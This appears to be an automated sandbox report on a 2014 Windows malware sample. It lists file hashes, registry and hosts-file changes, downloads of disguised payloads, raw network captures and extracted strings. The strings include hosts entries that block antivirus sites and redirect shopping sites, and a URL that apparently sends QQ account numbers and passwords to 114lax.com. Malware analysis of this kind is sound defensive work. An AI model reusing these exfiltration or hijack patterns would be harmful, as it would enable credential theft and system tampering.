Analysis Date2014-09-02 16:15:31
MD5560eb9a62cf6e209623307b0cfe938a6
SHA1ccc2c835919230c25941050cc27056b1d135ef2e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: cc46aca97b4f5ff2f8afaafd53d5def4 sha1: 391513fff17764b5760011f63df0ea323bb64624 size: 229376
Section.rdata md5: 9e34367d76837123ad0447a1f5800858 sha1: 6f5365ba1f324f138ed11252bb487a0f9865217e size: 24576
Section.data md5: cc6ce3fb30ce9ddc79f8c80c813d2d1c sha1: 40ad6cff62ac548d647b61307f53250093560ff8 size: 249856
Timestamp2014-08-10 14:47:55
PackerMicrosoft Visual C++ v6.0
PEhash751d5a019bd71d4691f005b8c43645272b5a8fda
IMPhash0b8c36b70225ec8c60b2183de4929287

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.duba.com/?un_2_445816\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\Documents and Settings\Administrator\Desktop\CF\\xc3\\x8b\\xc2\\xa2\\xc3\\x87\\xc2\\xb9\\xc3\\x8f\\xc2\\xb5\\xc3\\x8d\\xc2\\xb3.lnk
Winsock URLhttp://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword= 6

Network Details:

DNS347745bb9f89d278.cdn.fhldns.com
Type: A
117.34.28.76
DNS347745bb9f89d278.cdn.fhldns.com
Type: A
61.155.149.77
DNSwww.soso56.com
Type: A
118.193.155.117
DNSwww.12000.com.cn
Type: A
118.193.155.117
DNSimg.freep.cn
Type: A
221.234.42.184
DNSimg.freep.cn
Type: A
221.234.36.242
DNSimg.freep.cn
Type: A
221.234.42.16
DNSimg.freep.cn
Type: A
221.234.42.16
DNSimg.freep.cn
Type: A
221.234.42.184
DNSimg.freep.cn
Type: A
221.234.36.242
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSwangyunfei.web7s.pcxue.net
Type: A
14.102.249.13
DNS1.soso56.com
Type: A
DNSd3.freep.cn
Type: A
DNSd2.freep.cn
Type: A
DNSjifendownload.2345.cn
Type: A
DNSwww.114lax.com
Type: A
HTTP GEThttp://1.soso56.com/acbbb.jpg
User-Agent: DownJet1.0
HTTP GEThttp://1.soso56.com/-8434_48740_mny.jpg
User-Agent: DownJet1.0
HTTP GEThttp://www.soso56.com/mima.jpg
User-Agent: DownJet1.0
HTTP GEThttp://www.12000.com.cn/cf5.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140810135722petu536124.jpg
User-Agent: DownJet1.0
HTTP GEThttp://1.soso56.com/gswb_1454_7654_356.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140810105338fj9u536124.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140810135834c4nk536124.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140810210616ab0y536124.jpg
User-Agent: DownJet1.0
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent: DownJet1.0
HTTP GEThttp://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1031 ➝ 117.34.28.76:80
Flows TCP192.168.1.1:1032 ➝ 117.34.28.76:80
Flows TCP192.168.1.1:1033 ➝ 118.193.155.117:80
Flows TCP192.168.1.1:1034 ➝ 118.193.155.117:80
Flows TCP192.168.1.1:1035 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1036 ➝ 117.34.28.76:80
Flows TCP192.168.1.1:1037 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1038 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1039 ➝ 221.234.42.16:80
Flows TCP192.168.1.1:1040 ➝ 61.160.245.8:80
Flows TCP192.168.1.1:1041 ➝ 14.102.249.13:80

Raw Pcap
0x00000000 (00000)   47455420 2f616362 62622e6a 70672048   GET /acbbb.jpg H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a20446f 776e4a65 74312e30 0d0a486f   : DownJet1.0..Ho
0x00000040 (00064)   73743a20 312e736f 736f3536 2e636f6d   st: 1.soso56.com
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20436c   ..Connection: Cl
0x00000060 (00096)   6f73650d 0a436163 68652d43 6f6e7472   ose..Cache-Contr
0x00000070 (00112)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f2d3834 33345f34 38373430   GET /-8434_48740
0x00000010 (00016)   5f6d6e79 2e6a7067 20485454 502f312e   _mny.jpg HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   55736572 2d416765 6e743a20 446f776e   User-Agent: Down
0x00000040 (00064)   4a657431 2e300d0a 486f7374 3a20312e   Jet1.0..Host: 1.
0x00000050 (00080)   736f736f 35362e63 6f6d0d0a 436f6e6e   soso56.com..Conn
0x00000060 (00096)   65637469 6f6e3a20 436c6f73 650d0a43   ection: Close..C
0x00000070 (00112)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x00000080 (00128)   2d636163 68650d0a 0d0a                -cache....

0x00000000 (00000)   47455420 2f6d696d 612e6a70 67204854   GET /mima.jpg HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000030 (00048)   20446f77 6e4a6574 312e300d 0a486f73    DownJet1.0..Hos
0x00000040 (00064)   743a2077 77772e73 6f736f35 362e636f   t: www.soso56.co
0x00000050 (00080)   6d0d0a43 6f6e6e65 6374696f 6e3a2043   m..Connection: C
0x00000060 (00096)   6c6f7365 0d0a4361 6368652d 436f6e74   lose..Cache-Cont
0x00000070 (00112)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000080 (00128)   0a636163 68650d0a 0d0a                .cache....

0x00000000 (00000)   47455420 2f636635 2e6a7067 20485454   GET /cf5.jpg HTT
0x00000010 (00016)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000020 (00032)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000030 (00048)   446f776e 4a657431 2e300d0a 486f7374   DownJet1.0..Host
0x00000040 (00064)   3a207777 772e3132 3030302e 636f6d2e   : www.12000.com.
0x00000050 (00080)   636e0d0a 436f6e6e 65637469 6f6e3a20   cn..Connection: 
0x00000060 (00096)   436c6f73 650d0a43 61636865 2d436f6e   Close..Cache-Con
0x00000070 (00112)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000080 (00128)   0d0a6163 68650d0a 0d0a                ..ache....

0x00000000 (00000)   47455420 2f337462 5f313430 38313031   GET /3tb_1408101
0x00000010 (00016)   33353732 32706574 75353336 3132342e   35722petu536124.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f677377 625f3134 35345f37   GET /gswb_1454_7
0x00000010 (00016)   3635345f 3335362e 6a706720 48545450   654_356.jpg HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000030 (00048)   2a0d0a55 7365722d 4167656e 743a2044   *..User-Agent: D
0x00000040 (00064)   6f776e4a 6574312e 300d0a48 6f73743a   ownJet1.0..Host:
0x00000050 (00080)   20312e73 6f736f35 362e636f 6d0d0a43    1.soso56.com..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000070 (00112)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000080 (00128)   206e6f2d 63616368 650d0a0d 0a636865    no-cache....che
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38313031   GET /3tb_1408101
0x00000010 (00016)   30353333 38666a39 75353336 3132342e   05338fj9u536124.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38313031   GET /3tb_1408101
0x00000010 (00016)   33353833 3463346e 6b353336 3132342e   35834c4nk536124.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38313032   GET /3tb_1408102
0x00000010 (00016)   31303631 36616230 79353336 3132342e   10616ab0y536124.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d364972 355f7631 342e372e 312e6578   m6Ir5_v14.7.1.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000060 (00096)   656e743a 20446f77 6e4a6574 312e300d   ent: DownJet1.0.
0x00000070 (00112)   0a486f73 743a206a 6966656e 646f776e   .Host: jifendown
0x00000080 (00128)   6c6f6164 2e323334 352e636e 0d0a436f   load.2345.cn..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20436c 6f73650d   nnection: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f78696e 332f6d61 696c2e61   GET /xin3/mail.a
0x00000010 (00016)   73703f71 716e756d 6265723d 26717170   sp?qqnumber=&qqp
0x00000020 (00032)   61737377 6f72643d 25323025 32303620   assword=%20%206 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000050 (00080)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000060 (00096)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000070 (00112)   204e5420 352e313b 20535631 290d0a48    NT 5.1; SV1)..H
0x00000080 (00128)   6f73743a 20777777 2e313134 6c61782e   ost: www.114lax.
0x00000090 (00144)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x000000a0 (00160)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings
\
 \
.-E-0-000-+ 
00...........?-  
0
0 
0
LlE
CC
.
 
\
 \
.00-+ -E-0-0
00.S...........?-  
0
0 
0
lu....6. u
Ajjj
Cjjj
Djjj
.exe
         (((((                  H
(null)
unicode text
^,_^][
                          
\....\
00:00:00
"@0123456789ABCDEF
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0SSSSS
0WWWWW
126126126126
127.0.0.1   360.cn
127.0.0.1   bbs.360.cn
127.0.0.1   bbs.duba.net
127.0.0.1   bbs.ikaka.com
127.0.0.1   bbs.janmeng.com
127.0.0.1   bbs.kafan.cn
127.0.0.1   bbs.sanfans.com
127.0.0.1   bbs.sd.keniu.com
127.0.0.1   bbs.shadu007.com
127.0.0.1   bbs.taobao.com
127.0.0.1   bbs.vc52.cn
127.0.0.1   cd001.www.duba.net
127.0.0.1   club.alimama.com
127.0.0.1   forum.taobao.com
127.0.0.1   lt.ijinshan.com
127.0.0.1   taoke.alimama.com
127.0.0.1   www.360.cn
127.0.0.1   www.alimama.com
127.0.0.1   www.ijinshan.com
127.0.0.1   www.kafan.cn
127.0.0.1   www.kpfans.com
127.0.0.1   www.shadu007.coC:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1   www.shadu007.com
127.0.0.1   www.virscan.org
1#QNAN
1#SNAN
219.235.1.101   517xky.webnode.cn
219.235.1.101   bijibendiannao.blog.china.com
219.235.1.101   cpro.baidu.com
219.235.1.101   diannao.nav123.com
219.235.1.101   mall.yi85.com
219.235.1.101   shouji.tbw.net.cn
219.235.1.101   tbwwsgwdn.tao132.cn
219.235.1.101   www.66taoke.com
219.235.1.101   www.77taoba.com
219.235.1.101   www.91kd.cn
219.235.1.101   www.949528.cn
219.235.1.101   www.cntorg.com
219.235.1.101   www.haixitaoke.com
219.235.1.101   www.hl-sms.cn
219.235.1.101   www.lizhishu.com
219.235.1.101   www.mbaobao.com
219.235.1.101   www.mbbw.info
219.235.1.101   www.mvptaoke.com
219.235.1.101   www.nongyecn.com
219.235.1.101   www.pg8.cn
219.235.1.101   www.qiangdiannao.cn
219.235.1.101   www.shopnokia.info
219.235.1.101   www.sjxun.com
219.235.1.101   www.sugouwu.com
219.235.1.101   www.taobao.com
219.235.1.101   www.taobao-mo.com
219.235.1.101   www.taobao-shouji.com
219.235.1.101   www.taok.cc
219.235.1.101   www.taoke.info
219.235.1.101   www.taoke.la
219.235.1.101   www.taokw.com
219.235.1.101   www.ttcome.cn
219.235.1.101   www.ywaili.com
222333
 2345zhen
%2\CLSID
%2\DocObject
%2\Insertable
%2\protocol\StdFileEditing\server
%2\protocol\StdFileEditing\verb\0
   360SE
3F3F6767673E2121247C71683E737F7D3F68797E233F7D71797C3E7163602F61617E657D7275622D8DD8900FB786464602A
.4.7.lnk
4~f9.u
\$4UVW
_7654_356.exe
_7654_5943.exe
^}%95t
%9, %8
_9=D5I
_9=TCB
9t$dt7
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abnormal program termination
 acbbb
Accept: */*
AdjustWindowRectEx
ADSafe3.lnk
advapi32.dll
Advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
   Aguangshushurufazhen
An application has made an attempt to load the C runtime library incorrectly.
AppendMenuA
AsDefault=1
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="2345.com" type="win32"></assemblyIdentity><description>2345.com</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS></application></compatibility></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXC:\Program Files\Common Files\Microsoft Shared\autoinstall.exe
AtlAxWinInit
atl.dll
ATL.DLL
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
.?AUCThreadData@@
August
.?AUIMessageFilter@@
.?AUIUnknown@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_OLE_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCommonDialog@@
.?AVCDC@@
.?AVCDialog@@
.?AVCException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCMapPtrToPtr@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCOleBusyDialog@@
.?AVCOleDialog@@
.?AVCOleMessageFilter@@
.?AVCResourceException@@
.?AVCSimpleException@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVXMessageFilter@COleMessageFilter@@
bad allocation
bad exception
BaiduAnTray.exe
\BaiduAnUpdate.exe
  baiduSD
BaiduSdTray.exe
\BaiduSdUpdate.exe
 Base Class Array'
 Base Class Descriptor at (
__based(
BBFFf;
BeginPaint
BitBlt
blackmoon
BlackMoon RunTime Error:
BlueSoftSetup_bsugqr.exe
B QQP3
CallNextHookEx
CallWindowProcA
C:\bdkv_install.log
C:\BlueSoftSetup.log
CCmdTarget
__cdecl
CDialog
C:\Documents and Settings\administrator\
C:\Documents and Settings\Administrator\
C:\Documents and Settings\Administrator\Application Data\360se6\Application\360se.exe
C:\Documents and Settings\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Documents and Settings\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\bluefiles
C:\Documents and Settings\All Users\
C:\DuDu\uninstall.exe
CException
CGdiObject
CheckedValue
CheckMenuItem
CheckMenuRadioItem
Chrome=0
 Class Hierarchy Descriptor'
ClientToScreen
CloseHandle
ClosePrinter
__clrcall
     cls
CLSID\%1
CLSID\%1\AuxUserType\2
CLSID\%1\AuxUserType\3
CLSID\%1\DefaultExtension
CLSID\%1\DefaultIcon
CLSID\%1\DocObject
CLSID\%1\InprocHandler32
CLSID\%1\InProcServer32
CLSID\%1\Insertable
CLSID\%1\LocalServer32
CLSID\%1\MiscStatus
CLSID\%1\Printable
CLSID\%1\ProgID
CLSID\%1\Verb\0
CLSID\%1\Verb\1
CLSIDFromProgID
CLSIDFromString
CMapPtrToPtr
CMemoryException
CNotSupportedException
CObject
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COleBusyDialog
COleDialog
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
 Complete Object Locator'
[Config]
Connection: close
CONOUT$
`copy constructor closure'
CopyRect
CoRegisterMessageFilter
CoRevokeClassObject
CorExitProcess
CoUninitialize
C:\Program Files\2345Explorer
C:\Program Files\2345explorer\2345explorer.exe
C:\Program Files\2345Explorer\Uninstall.exe
C:\Program Files\2345Pic
C:\Program Files\2345Pic\Uninstall.exe
C:\Program Files\91yGame\unins000.exe
C:\Program Files\ADSafe3\ADSafe.exe
C:\Program Files\ADSafe3\uninst.exe
C:\Program Files\ainqngz3.9\uninstall.exe
C:\Program Files\ainqngz4.7\uninstall.exe
C:\Program Files\Baidu\BaiduAn\2.1.0.1154\BaiduAnUpdate.exe
C:\Program Files\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe
C:\Program Files\baidu\BaiduBrowser\baidubrowser.exe
C:\Program Files\Baidu\BaiduSd\1.8.0.1196\BaiduSdUpdate.exe
C:\Program Files\Baidu\BaiduSd\1.8.0.1255\BaiduSdUpdate.exe
C:\Program Files\Baofeng\StormPlayer\Uninst.exe
C:\Program Files\BlueBox
C:\Program Files\BlueBox\uninst.exe
C:\Program Files\Common Files
C:\Program Files\Common Files\
C:\Program Files\Common Files\-8434_48740_mny.exe
C:\Program Files\Common Files\-8434_48740_mvy.exe
C:\Program Files\Common Files\acbbb.exe
C:\Program Files\Common Files\asdqw_3104-48740.exe
C:\Program Files\Common Files\baidu.exe
C:\Program Files\Common Files\baidu.jpg
C:\Program Files\Common Files\bdsd_1454_7654_356.exe
C:\Program Files\Common Files\bdsd_1454_7654_5943.exe
C:\Program Files\Common Files\bdws_1454_7654_5943.exe
C:\Program Files\Common Files\gswb_1454_7654_356.exe
C:\Program Files\Common Files\gswb_1454_7654_356.jpg
C:\Program Files\Common Files\gswb_1454_7654_5943.exe
C:\Program Files\Common Files\gswb_1454_7654_5943.jpg
C:\Program Files\Common Files\Microsoft Shared\2345pack.ini
C:\Program Files\Common Files\Microsoft Shared\2345.txt
C:\Program Files\Common Files\Microsoft Shared\aaa.exe
C:\Program Files\Common Files\Microsoft Shared\acbbb.txt
C:\Program Files\Common Files\Microsoft Shared\apk
C:\Program Files\Common Files\Microsoft Shared\autoinstall.exe
C:\Program Files\Common Files\Microsoft Shared\meinv.txt
C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\Microsoft Shared\pp3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\mi.exe
